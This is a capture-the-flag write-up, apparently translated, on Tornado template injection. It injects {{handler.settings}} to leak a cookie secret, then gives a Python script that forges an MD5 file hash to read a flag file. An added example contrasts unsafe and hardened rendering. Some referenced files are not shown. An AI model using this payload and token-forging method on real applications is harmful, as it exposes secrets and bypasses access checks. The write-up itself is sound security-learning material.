Opening the challenge shows three files:
The three files read as follows:
From the URL we can see that accessing a file requires two parameters: filename and filehash.
Accessing the file directly does not work. I thought of capturing the traffic with Burp, but caught nothing for a long time; the write-ups online say this is template injection.
Tornado provides a Python template engine, and the render in welcome.txt is a Python rendering function.
When an error occurs, the URL looks like this:
Try replacing the trailing part with {{111}}: it is output!
Tornado templates expose some objects that can be accessed directly, for example:
<title> {{ escape(handler.settings["cookie"]) }} </title>
So we input: {{handler.settings}}
Once we have the cookie value, the rest is straightforward:
import hashlib


def md5value(s):
    # Return the hex MD5 digest of a bytes object
    md5 = hashlib.md5()
    md5.update(s)
    return md5.hexdigest()


def jiami():
    filename = '/fllllllllllllag'
    cookie_s = "ea7d75de-4ca5-486a-a69c-e690f3a8c217"
    # md5 of the file name
    print(md5value(filename.encode('utf-8')))
    x = md5value(filename.encode('utf-8'))
    # md5 of the cookie value concatenated with md5(filename)
    y = cookie_s + x
    print(md5value(y.encode('utf-8')))


jiami()
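Why the {{handler.settings}} input above is evaluated, and how the rendering call should be written instead, as an added example that is not part of the original write-up or the challenge's code. It assumes Tornado is installed; FAKE_HANDLER, render_vulnerable, render_hardened and the secret value are hypothetical and constructed for illustration.

```python
from types import SimpleNamespace

from tornado.template import Template

# Constructed stand-in for the RequestHandler object that Tornado's
# render()/render_string() place in every template namespace as `handler`.
FAKE_HANDLER = SimpleNamespace(
    settings={"cookie_secret": "CONSTRUCTED-SECRET-0000"}
)


def render_vulnerable(msg: str) -> bytes:
    # BAD: msg becomes part of the template *source*, so any {{ ... }}
    # it contains is compiled and evaluated on the server.
    return Template("<p>" + msg + "</p>").generate(handler=FAKE_HANDLER)


def render_hardened(msg: str) -> bytes:
    # GOOD: the template source is a constant. msg is passed in as data
    # only, and Tornado's default autoescape HTML-escapes it on output.
    return Template("<p>{{ msg }}</p>").generate(
        handler=FAKE_HANDLER, msg=msg
    )


if __name__ == "__main__":
    # Inputs taken from the write-up, plus one plain HTML string.
    for probe in ("{{111}}", "{{handler.settings}}", "<b>hi</b>"):
        print(repr(probe))
        print("  vulnerable:", render_vulnerable(probe))
        print("  hardened:  ", render_hardened(probe))
```

In the hardened form the braces come back as literal text, so application settings never reach the response.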